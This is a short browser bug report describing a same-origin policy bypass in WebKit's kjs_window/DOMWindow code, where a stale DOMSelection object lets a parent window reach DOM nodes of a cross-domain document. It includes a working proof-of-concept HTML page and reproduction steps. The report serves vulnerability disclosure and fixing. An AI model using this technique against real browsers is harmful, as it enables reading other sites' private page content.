Bug 14610

The problem was introduced by recent code refactoring in kjs_window
and DOMWindow. When navigating to a new page, DOMWindow does nott
clear up its DOMSelection object.

To show the problem, save following text into a file, say 'selection.html':

<html><script>
var child;
var sel;

function openwin() {
 child = open("hello.html");
}
function getsel() {
 sel = child.getSelection();
}
function reloadwin() {
 child.location="world.html";
}
function check() {
 var selected = sel.anchorNode;
 var new_doc = selected.ownerDocument;
 alert(new_doc.baseURI);
}

</script>
<body>
<button onclick="openwin()">open</button>
<button onclick="getsel()">get selection</button>
<button onclick="reloadwin()">reload</button>
<button onclick="check()">check</button>
</body></html>

Also create two files called hello.html, and world.html.
<html><body>hello</body></html>
<html><body>world</body></html>


Put selection.html and hello.html in the same domain, and put
world.html in a different domain (you need to change URLs of
hello.html and world.html in selection.html).

Do following steps:
1. load 'selection.html' in a new window;
2. click the 'open' button, it opens a child window;
3. select "hello" text in the child window;
4. click the 'get selection' in the parent window;
5. click the 'check' button, an alert window pops up and displays the
URL of 'hello.html'.

So far so good.

6. click the 'reload' button in the parent window, it loads
'world.html' page in the child window.
   Note that now, the parent window and the child window are in
different domains.
7. select 'world' in the child window;
8. click the 'check' button in the first window. an alert window pops
up, and displays the URL of 'world.html'.  At this point, the parent
window has full access to the Document object and DOM nodes under it
in the child window even they are from different domains.

I will make a patch later.